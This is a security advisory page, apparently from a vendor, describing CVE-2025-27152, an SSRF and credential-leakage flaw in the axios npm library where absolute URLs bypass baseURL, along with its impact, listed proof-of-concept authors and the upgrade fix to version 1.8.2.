CVE-2025-27152
SSRF vulnerability in axios (npm)
What is CVE-2025-27152 About?
This vulnerability in axios allows Server-Side Request Forgery and credential leakage when absolute URLs are passed, even if `baseURL` is set. Attackers can bypass `baseURL` restrictions, leading to requests being sent to unintended external servers. This makes exploitation fairly straightforward for an attacker who can control parts of the URL used in axios requests.
Affected Software
Technical Details
The vulnerability occurs in axios when an absolute URL is provided as a parameter to request methods (e.g., get()), even if a baseURL has been configured. Instead of combining the absolute URL with the baseURL, axios prioritizes the absolute URL directly. This bypasses the intended routing to the baseURL, causing the request to be sent to the absolute URL. Consequently, if sensitive headers (like X-API-KEY) are configured for baseURL requests, they are sent to the attacker-controlled absolute URL. This leads to Server-Side Request Forgery (SSRF) by allowing requests to arbitrary internal or external hosts and credentials leakage due to the include of sensitive headers.
What is the Impact of CVE-2025-27152?
Successful exploitation may allow attackers to perform Server-Side Request Forgery (SSRF), access internal network resources, exfiltrate sensitive credentials or API keys, and potentially compromise internal systems.
What is the Exploitability of CVE-2025-27152?
Exploitation requires an attacker to manipulate the URL supplied to an axios request within an application where baseURL is configured, but the input URL is not properly validated. The complexity is low if the attacker can control the path parameter of the request. No authentication to the target system is required for the SSRF itself, although credential leakage relies on the target system sending authenticated requests. This is a remote vulnerability, affecting both server-side and client-side axios usage. Special conditions include the use of baseURL and the lack of validation on the absolute URL parameter. The risk factor heavily increases if applications dynamically construct URLs based on untrusted input without strict URL validation prior to making requests via axios.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| andreglock | Link | Demonstration of CVE-2025-27152 |
| davidblakecoe | Link | Axios CVE-2025-27152 PoC |
What are the Available Fixes for CVE-2025-27152?
About the Fix from Resolved Security
The patch updates the URL-building logic to respect a new config option, allowAbsoluteUrls, preventing unintentional combination of baseURL and absolute URLs. This fixes CVE-2025-27152 by blocking unexpected request redirection or SSRF vulnerabilities that could occur when absolute URLs were previously allowed to bypass baseURL restrictions.
Available Upgrade Options
- axios
- <1.8.2 → Upgrade to 1.8.2
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
- https://osv.dev/vulnerability/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios
- https://nvd.nist.gov/vuln/detail/CVE-2025-27152
- https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios/releases/tag/v1.8.2
- https://github.com/axios/axios/issues/6463
- https://github.com/axios/axios/issues/6463
What are Similar Vulnerabilities to CVE-2025-27152?
Similar Vulnerabilities: CVE-2023-38495 , CVE-2021-39148 , CVE-2023-28155 , CVE-2023-46387 , CVE-2021-22926
